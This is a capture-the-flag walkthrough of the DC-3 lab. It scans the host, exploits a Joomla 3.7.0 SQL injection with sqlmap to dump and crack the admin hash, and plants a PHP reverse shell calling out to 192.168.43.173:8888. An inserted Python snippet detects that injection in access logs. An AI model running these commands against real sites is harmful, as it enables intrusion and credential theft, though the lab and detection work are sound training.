DC: 3.2

Description
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).
If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

Write-up

hausa@debian:~$ fping -asg 172.16.1.1/24
172.16.1.1
172.16.1.133

hausa@debian:~$ nmap -A -p 1-65535 172.16.1.133
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 07:41 EDT
Nmap scan report for bogon (172.16.1.133)
Host is up (0.00015s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds

View port 80:

hausa@debian:~$ joomscan -u 172.16.1.133
[+] Detecting Joomla Version
[++] Joomla 3.7.0

hausa@debian:~$ searchsploit joomla 3.7.0
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt

View 42033.txt

hausa@debian:~$ sqlmap -u "http://172.16.1.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C password --dump -p list[fullordering]
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
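
A defender-side check for the request shape used in the sqlmap step above, as an added example that is not part of the original write-up: it scans web-server access-log lines for com_fields requests whose list[fullordering] value is not a plain sort expression. The sample log lines, the function name suspicious_ordering and the allow-list pattern for legitimate values are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP, request target and status from an Apache common/combined log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: a legitimate sort value is "<column> <ASC|DESC>", e.g. "a.title ASC".
SAFE_ORDERING = re.compile(r'[A-Za-z_][A-Za-z0-9_.]* (?:ASC|DESC)', re.IGNORECASE)

# Constructed sample log lines (not captured from the lab).
SAMPLE_LOG = [
    '172.16.1.10 - - [01/Sep/2020:07:50:01 -0400] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120',
    '172.16.1.10 - - [01/Sep/2020:07:50:09 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 310',
    '172.16.1.12 - - [01/Sep/2020:07:50:15 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 310',
    '172.16.1.11 - - [01/Sep/2020:07:51:30 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.title%20ASC HTTP/1.1" 200 4100',
]


def suspicious_ordering(log_lines):
    """Return (client_ip, status, value) for com_fields requests whose
    list[fullordering] value is not a plain "column direction" pair."""
    hits = []
    for line in log_lines:
        match = REQUEST.match(line)
        if not match:
            continue
        ip, target, status = match.groups()
        # parse_qs percent-decodes keys and values, so list%5Bfullordering%5D
        # and list[fullordering] end up under the same key.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_fields" not in params.get("option", []):
            continue
        for value in params.get("list[fullordering]", []):
            # fullmatch: anything beyond "column direction" is reported.
            if not SAFE_ORDERING.fullmatch(value):
                hits.append((ip, int(status), value))
    return hits


if __name__ == "__main__":
    for ip, status, value in suspicious_ordering(SAMPLE_LOG):
        print(f"{ip} status={status} list[fullordering]={value!r}")
```

Access logs only record the query string, so the same parameter sent in a POST body would need request-body logging or a WAF rule to be seen.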

hausa@debian:~$ sudo john temp.txt
snoopy (?)

Log in with admin:snoopy and write eval code to a PHP file:
system('bash -i >& /dev/tcp/192.168.43.173/8888 0>&1');
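For some reason the reverse shell never connected back, though, so I had to work through the browser instead:
?hausa=bash -c 'whoami;ls' to pretend I had a shell
lsb_release -a
Then escalate privileges with an existing exploit.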

Summary
~ The reverse shell would not connect back; reason unknown...
~ Using searchsploit